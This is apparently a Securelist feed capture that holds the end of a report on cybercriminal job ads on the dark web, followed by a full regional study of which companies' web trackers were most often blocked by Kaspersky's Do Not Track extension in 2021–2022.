Various performance-dependent commission was often promised in addition to the salary. For example, a pentester could be promised a monthly salary of $10,000 along with a percentage of the profits received from selling access to a compromised organization’s infrastructure or confidential data, extortion, and other ways of monetizing the hack.

Example of a job ad that offered a salary and a performance bonus

Example of a job ad that offered a salary and a performance bonus

See translation

Seeking WIN pentester to join our team.

  1. Experience with Cobalt Strike, MSF, etc. required
  2. Commitment to work is a must
  3. No addictions

Compensation up to $10,000/mo. + bonus.
PM if interested.

Candidates were often offered commission only. In several cases, no compensation of any kind was provided. Applicants were offered to work pro bono, for promised commission, or for a share of the profits in the future.

Example of an unpaid job ad

Example of an unpaid job ad

Takeaways

The dark web is a versatile platform that cybercriminals not only use for striking deals and spreading illegal information, but also for hiring members to their teams and groups.

The data provided in this report shows that demand for IT professionals is fairly high on cybercrime websites, with new team members often being salaried employees. It is interesting, too, that cybercrime communities use the same methods for recruiting new members as legitimate organizations, and job ads they post often resemble those published on regular recruitment sites.

The ads we analyzed also suggest that a substantial number of people are willing to engage in illicit or semilegal activities despite the accompanying risks. In particular, many turn to the shadow market for extra income in a crisis. Thus, the number of resumes on dark web sites surged as the pandemic broke out in March 2020. Although dark web jobs could be expected to pay higher than legitimate ones, we did not detect a significant difference between the median levels of IT professionals’ compensation in the cybercriminal ecosystem and the legitimate job market.

Software development proved to be the most sought-after skill, with 61% of all ads seeking developers. This could suggest that the complexity of cyberattacks is growing. The higher demand for developers could be explained by a need to create and configure new, more complex tools.

It is worth noting that the risks associated with working for a dark web employer still outweigh the benefits. The absence of a legally executed employment contract relieves employers of any responsibility. A worker could be left unpaid, framed or involved in a fraudulent scheme.

It is not worth forgetting the risks of being prosecuted, put on trial and imprisoned for the unlawful activities. The risks of cooperating with hacker groups are especially high, as deanonymization of their members is a priority for cybercrime investigation teams. The group may be exposed sooner or later, and its members, face jail time.

To inquire about threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

To get the full version of the report, please fill in the form below. If you cannot see the form, try opening this post in Chrome with all script-blocking plugins off.


[1] Salary levels expressed in Russian rubles were converted using the effective rate at the time of the study: 75 rubles per dollar.

]]>
https://securelist.com/darknet-it-headhunting/108526/feed/ 0 full large medium thumbnail
Who tracked internet users in 2021–2022 https://securelist.com/tracker-report-2021-2022/108079/ https://securelist.com/tracker-report-2021-2022/108079/#respond Fri, 25 Nov 2022 08:00:07 +0000 https://kasperskycontenthub.com/securelist/?p=108079

Every time you go online, someone is watching over you. The services you use, the websites you visit, the apps on your phone, smart TVs, gaming consoles, and any networked devices collect data on you with the help of trackers installed on web pages or in software. The websites and services send this data to their manufacturers and partners whose trackers they use. Companies are looking for all kinds of information on you: from device specifications to the way you are using a service, and the pages you are opening. Data thus collected primarily helps companies, firstly, to understand their customers better and improve the products by analyzing the user experience, and, secondly, to predict user needs and possibly even manipulate them. Besides, the more an organization knows about you, the better it can personalize ads that it shows you. These ads command higher rates than random ones and therefore generate higher profits.

Understanding who is collecting the data and why requires you to have free time and to know where to look. Most services have published privacy policies, which should ideally explain in detail what data the service collects and why. Sadly, these policies are seldom transparent enough. Worried about this lack of transparency, users and privacy watchdogs put pressure on technology companies. Certain tech giants recently started adding tools to their ecosystems that are meant to improve the data collection transparency. For example, upon the first run of an app downloaded from the App Store, Apple inquires if the user is willing to allow that app to track their activity. However, not every service provides this kind of warnings. You will not see a prompt like that when visiting a website, even if you are doing it on an Apple device.

Browser privacy settings and special extensions that recognize tracking requests from websites and block these can protect you from tracking as you surf the web. That is how our Do Not Track (DNT) extension works. Furthermore, with the user’s consent, DNT collects anonymized data on what tracking requests are being blocked and how frequently. This report will look at companies that collect, analyze, store user data, and share it with partners, as reported by DNT.

Statistics collection principles

This report uses anonymous statistics collected between August 2021 and August 2022 by the Do Not Track component, which blocks loading of web trackers. The statistics consist of anonymized data provided by users voluntarily. We have compiled a list of 25 tracking services that DNT detected most frequently across nine regions and certain individual countries. 100% in each case represents the total number of DNT detections triggered by all 25 tracking services.

DNT (disabled by default) is part of Kaspersky Internet Security, Kaspersky Total Security, and Kaspersky Security Cloud.

Global web tracking giants

Six tracking services made the TOP 25 rankings in each of the regions at hand. Four of them are owned by Google: Google Analytics, Google AdSense, Google Marketing Platform, and YouTube Analytics. The remaining two are owned by Meta and Criteo, which we will cover later.

Google

Our last report, published in 2019, took a close look at Google’s trackers: DoubleClick, Google AdSense, Google Analytics, and YouTube Analytics. This was right around the time when the search giant announced plans to rebrand the DoubleClick advertising platform and merge it with its advertising ecosystem. Today, DoubleClick is part of Google Marketing Platform, although the tracking URLs have not changed and continue to function as before. For convenience, our statistics will refer to that tracking service as “Google Marketing Platform (ex-DoubleClick)”.

Share of DNT detections triggered by Google Marketing Platform (ex-DoubleClick) trackers in each region, August 2021 — August 2022 (download)

Google Marketing Platform (ex-DoubleClick) had its largest shares in our TOP 25 rankings for South Asia (32.92%) and the Middle East (32.84%). These were followed by its shares in Africa and Latin America: 25.37% and 24.64%, respectively. The lowest share (just 7.05%) of Google Marketing Platform (ex-DoubleClick) DNT detections in our regional TOP 25 rankings of the busiest tracking services were observed in the CIS.

A further tracking service operated by Google, Google Analytics, collects data on website visitors and provides detailed statistics to clients. That service, too, accounts for a fairly large share of DNT detections across the world.

Share of DNT detections triggered by Google Analytics trackers in each region, August 2021 — August 2022 (download)

A look at the share of Google Analytics in various regions will reveal a similar pattern to the Google Marketing Platform (ex-DoubleClick). Google Analytics received its largest shares of detections in South Asia (18.04%), Latin America (17.97%), Africa (16.56%) and the Middle East (16.44%). Its smallest share was in the CIS: 9.06%.

Share of DNT detections triggered by Google AdSense trackers in each region, August 2021 — August 2022 (download)

Another tracking system operated by Google is Google AdSense context ad service. This, again, had its highest percentages in the Middle East (5.27%), Africa (4.63%), Latin America (4.44%), and South Asia (4.44%). Here, too, the CIS ranked last with just 1.45% of detections triggered by the service.

Rounding out the list of Google’s tracking services is YouTube Analytics. It provides YouTube bloggers with data on their audiences that its trackers collect and analyze.

Share of DNT detections triggered by YouTube Analytics trackers in each region, August 2021 — August 2022 (download)

The Middle East (8.04%), South Asia (7.79%), Africa (5.97%), and Latin America (5.02%) again accounted for the highest shares of detections. At the bottom of the region list this time around is North America (1.82%), rather than the CIS (2.54%). The low percentage is no indication of YouTube’s insignificant presence in the region. The small share of YouTube Analytics in the region was likely due to fierce competition among services that collect and analyze data. We will revisit this later.

Meta (Facebook)

Facebook Custom Audiences by Meta, which provides targeted advertising services, was present in each of the regions along with Google’s tracking services. Services like that collect various types of user data, analyze these, and segment the audience to ensure better ad targeting. An advertiser who uses a targeting service wins by having their products shown to the people who are the likeliest to be interested. Compared to smaller advertising providers, Facebook Custom Audiences covers a significantly larger audience. Our data shows, however, that Meta was second to Google in terms of presence in all regions of the world.

Share of DNT detections triggered by Facebook Custom Audiences trackers in each region, August 2021 — August 2022 (download)

Facebook Custom Audiences had its largest shares in Latin America (8.76%) and Oceania (7.95%), and its smallest, in the CIS (2.12%). As mentioned above, the modest shares occupied by the global trackers could be linked to serious competition from local data collection and analysis services.

Criteo

The last on the list of tracking services detected in every corner of the world was Criteo. Though a less familiar name than Google or Facebook, Criteo actually is a major French advertising company providing a range of services from collection and analysis of user data to advertising itself.

Share of DNT detections triggered by Criteo trackers in each region, August 2021 —August 2022 (download)

Criteo trackers were most frequently detected in Europe (7.07%), East Asia (6.09%), and Latin America (5.24%), and least frequently, in South Asia (just 1.59%).

Regional landscape

In addition to the tracking services detected everywhere in the world, there were players of comparable size that did appear in most, but not all, TOP 25 rankings and local giants that dominated individual regions or countries. We will cover these below.

Europe

The aforementioned global tracking services held the top three places in Europe: Google Marketing Platform (ex-DoubleClick) (21.39%), Google Analytics (15.23%), and Criteo (7.07%). Facebook Custom Audiences was fifth, with 5.29%, Google AdSense was seventh, with 3.59%, and YouTube Analytics eleventh, with 2.97%. Trackers owned by five other major companies occupied the fourth, sixth, eighth, ninth, and tenth positions in our rankings.

TOP 25 tracking services in Europe, August 2021 — August 2022 (download)

Amazon Technologies, which accounted for 6.31% of total detections associated with prevalent trackers in Europe, stands for trackers operated by Amazon Advertising, an Amazon subsidiary that collects and analyzes user data to help their clients to connect with consumers, in addition to placing ads in all Amazon services. This is essentially a classic advertising giant similar to Google Marketing Platform and Criteo. Amazon trackers will come up more than once in other regional TOP 25 rankings.

Index Exchange, the Canadian-based global advertising marketplace with a 4.12% percent share in Europe, is another such giant.

Bing Ads, with a share of 3.45%, was another tracking service popular in the region. It provides search query analysis and displays ads in the Bing search engine. It was followed by Adloox (3.21%), which we covered in the previous review, and Improve Digital (3.17%), a Dutch advertising platform.

Facebook was the fifteenth most popular tracking service in the region, with 1.96%. This is another Meta service, which tracks Facebook account activity, such as logins and interaction with plugins and Like buttons on other websites. The service features in the TOP 25 almost in every region, with the exception of North America, Russia and Iran.

Certain tracking services, such as Meetrics (DoubleVerify), with a share of 1.28%, and Virtual Minds, with a share of 1.39%, feature in the European TOP 25 only. This is hardly surprising, as both companies are headquartered in Germany.

Africa

The familiar advertising giants occupied the top four positions in Africa. Google Marketing Platform (ex-DoubleClick) had a huge share of 25.37%. Google Analytics was second, with 16.56%. YouTube Analytics and Facebook Custom Audiences were detected in 5.97% and 5.90% of total cases, respectively.

TOP 25 tracking services in Africa, August 2021 — August 2022 (download)

The fifth place was taken by Yahoo Web Analytics, with a share of 4.86%. This is a service that collects and analyzes data on Yahoo users. The presence of Yahoo Web Analytics in a regional TOP 25 is an indication that Yahoo services are popular in that region.

It is worth noting that the African TOP 25 included none of the tracking services popular in that region exclusively.

The Middle East

The six global tracking services occupied the top six positions in the Middle East. Google Marketing Platform (ex-DoubleClick) accounted for almost one-third (32.84%) of the total detections of the region’s most popular tracking services. Google Analytics trackers were detected in 16.44% of cases; YouTube Analytics trackers, in 8.04%; аnd Google AdSense trackers, in 5.27%. Google is evidently the biggest collector of user data in the Middle East.

TOP 25 tracking services in the Middle East, August 2021 — August 2022 (download)

There is a certain country in the region whose TOP 25 statistics we would like to consider separately because of a unique advertising market and hence, an online tracking landscape different from the rest of the Middle East.

Iran

Iran is the only country on our list where Google Analytics accounted for 50.72% of the total detections associated with the 25 leading tracking services. Google Marketing Platform (ex-DoubleClick) accounted for 11.76%.

TOP 25 tracking services in Iran, August 2021 — August 2022 (download)

Iran also has local tracking services that internet users there encounter fairly often. For instance, the advertising agency SabaVision, with a share of 4.62%, was third in the rankings and the advertising platform Yektan was fifth, with 3.90%.

Latin America

The tracking landscape in Latin America was not drastically different from the rest of the world. Again, Google, Facebook, and Criteo occupied the leading positions. They were followed by Yahoo Web Analytics (3.48%), trackers operated by the US analytics company Chartbeat (3.00%), Twitter (2.65%), and Amazon Technologies (2.62%).

TOP 25 tracking services in Latin America, August 2021 — August 2022 (download)

North America

The share of Google’s global tracking services was comparatively small in North America, as the charts in the first part of this report show. Google Marketing Platform (ex-DoubleClick) accounted for 18.22% of total detections in August 2021 — August 2022, which was the second smallest figure in terms of its regional shares. The North American share of YouTube Analytics trackers was their smallest altogether. This was due to the heavy presence of trackers operated by other companies: Amazon Technologies (6.90%), Yahoo Web Analytics (5.67%), and Adloox (5.57%). These companies created a more competitive environment, which resulted in the share of each tracking service in the total DNT detections being smaller.

TOP 25 tracking services in North America, August 2021 — August 2022 (download)

In addition to other regions’ leaders, the North American TOP 25 featured a few that only made the local rankings. Examples included the Canadian advertising ecosystem Sharethrough with a share of 1.99% and the American advertising company The Trade Desk, which accounted for 1.65% of the detections.

Oceania

Every well-known global web tracking service was represented in Oceania. Interestingly enough, Oceania and North America were the only two regions where trackers by Tremor Video, a company that specializes in video advertising, made their way into the TOP 25, with the shares of 1.15% and 2.54%, respectively.

TOP 25 tracking services in Oceania, August 2021 — August 2022 (download)

The CIS

The CIS (Commonwealth of Independent States) is a fairly interesting region that has a variety of local tracking services. It comprises diverse countries, each with its distinctive internet regulations and restrictions, which certainly affects the presence of advertising companies. We will start by looking at the aggregate statistics for the CIS exclusive of Russia, as that country dominates the market, distorting other countries’ statistical data somewhat.

TOP 25 tracking services in the CIS (excluding Russia), August 2021 — August 2022 (download)

The CIS was the only region at hand dominated by a local internet giant, rather than the Google Marketing Platform (ex-DoubleClick). Yandex.Metrika, with a share of 19.24%, topped the rankings of trackers popular in the region. Google’s tracking services occupied second (16.17%) and third (13.14%) places.

The Mediascope research company was fourth, with 5.55%. Besides collecting and analyzing user data for marketing purposes, Mediascope is the organization officially designated to evaluate the size of television channel audiences, and sending reports to Roskomnadzor, Russia’s mass media regulator.

Other tracking services specific to the CIS are the web counter Yadro.ru (4.88%), the ad management platform AdFox (4.68%), Russian ad tech company Buzzoola (3.03%), the ad management and audit service Adriver (2.74%), Between Digital (2.23%), Rambler Internet Holdings (1.95%), VK (ex-Mail.Ru Group, 1.92%), VKontakte (1.86%), AdMixer (1.70%), originally from Russia but now headquartered in London, and Uniontraff.com (1.03%).

Thus, 12 out of 25 most widely used web tracking services in the CIS (exclusive of Russia) were endemic to the market.

Russian Federation

Most of the tracking services that made the TOP 25 in Russia are homegrown. Yandex.Metrika and Mediascope, mentioned above, were first and second, respectively, with 19.73% and 12.51%. Google Analytics (8.83%) and Google Marketing Platform (ex-DoubleClick, 6.59%) occupied the third and fourth positions, their respective shares fairly low in comparison to the Russia-less CIS average of 13.14% and 16.17% respectively. The rest of the top positions went to local Russian tracking services.

TOP 25 tracking services in Russia, August 2021 — August 2022 (download)

East Asia

The East Asian landscape did not differ drastically from the rest of the world. It featured mostly the same tracking services as other parts of the globe. However, there were two exceptions: Japan and Korea. We singled out these countries as separate research entities to demonstrate their distinctive features and the maturity of local advertising companies, which were, by and large, the key user data collectors and analysts there.

Google Marketing Platform (ex-DoubleClick) featured quite prominently in the East Asian TOP 25 rankings with a 27.62% share, followed by Google Analytics (16.13%) and Facebook Custom Audiences (6.65%). YouTube Analytics had a share of 6.54%, and Yahoo Web Analytics, 5.79%.

TOP 25 tracking services in East Asia (excluding Japan and Korea), August 2021 — August 2022 (download)

Japan

Japan is the only country where Twitter trackers had a fairly high share (11.67%), overtaking both Facebook Custom Audiences (4.43%) and YouTube Analytics (3.24%). Similarly to other major social networks, Twitter tracks user activity on other websites in addition to its own. One of the tracking tools is Twitter Pixel, which owners can embed into their websites. Twitter trackers notably featured in the TOP 25 rankings of every region and country covered by the report, with the exception of Russia, where this service is blocked.

TOP 25 tracking services in Japan, August 2021 — August 2022 (download)

In addition to the global companies, the TOP 25 rankings for Japan featured local tracking services. Examples include trackers operated by the Japanese marketing and advertising agencies, such as Digital Advertising Consortium Inc (3.01%), Supership (2,86%), I-mobile (2.13%), AdStir (1.44%), Samurai Factory (0.99%), Logly (0.90%), the blogging platform Ameba (1.47%), and the online services vendor LINE Corporation (0.71%).

South Korea

Like Japan, South Korea is a peculiar region with mature local tech companies, which affects tracker distribution. Google led by a fairly wide margin: Google Marketing Platform (ex-DoubleClick) had a share of 25.49% and Google Analytics 19.74%. Trackers operated by Kakao, Korea’s largest internet company, accounted for as much as 10.90%, pushing it to third place. Kakao’s scale of operations is comparable to Japan’s LINE, Russia’s Yandex or China’s WeChat.

TOP 25 tracking services in South Korea, August 2021 — August 2022 (download)

Other Korean tracking services in the TOP 25 were eBay Korea (2.02%) and the targeted advertising service WiderPlanet (1.77%).

South Asia

The South Asian TOP 25 rankings of web tracking services most frequently detected by DNT looked similar to the general global pattern. As in the Middle East, Google Marketing Platform (ex-DoubleClick) had one of the highest shares globally in South Asia, 32.92%.

TOP 25 tracking services in South Asia, August 2021 — August 2022 (download)

The Indian tech and media giant Times Internet, which was not part of the TOP 25 in any other region of the world, had some presence in South Asia (0.97%).

Conclusion

There are only a few global companies that collect user data in every corner of the world. They are the universally recognized Google and Meta, as well as the advertising giant Criteo, little known to common users. We have seen that the more distinctive the region or country is linguistically, economically, and technologically, the higher the chances are that local companies will have some presence on the market and be able to compete with the global giants. Major local players typically go beyond just advertising and marketing to be providers of diverse online services on their home markets. For example, Korea’s Kakao, Japan’s LINE, and Russia’s Yandex are not just internet giants but key regional services that provide the population with all that it needs: from email and instant messaging to food delivery. As they collect and analyze user data, they naturally pursue the same objectives as the global giants.

Being aware that your online activity is tracked is no fun. Unfortunately, you cannot fully protect yourself against tracking — you can only minimize the amount of data that a company tracking you will obtain. That is also important, though: the less information on you is collected beyond your control, the less painful potential future leakages would be. There are various types of technical tools to protect you from web tracking. For instance, VPN changes your IP address, thus distorting to a degree the digital profile of you that marketing companies strive to build. Anti-tracking browser extensions like DNT block trackers while you surf the web, preventing companies from finding out what websites you use and how. You can also reduce the risk by sharing only the data that services need to function. That will not stop them from collecting your data, but it can significantly reduce the scope of the information that companies have about you.

]]>
https://securelist.com/tracker-report-2021-2022/108079/feed/ 0 full large medium thumbnail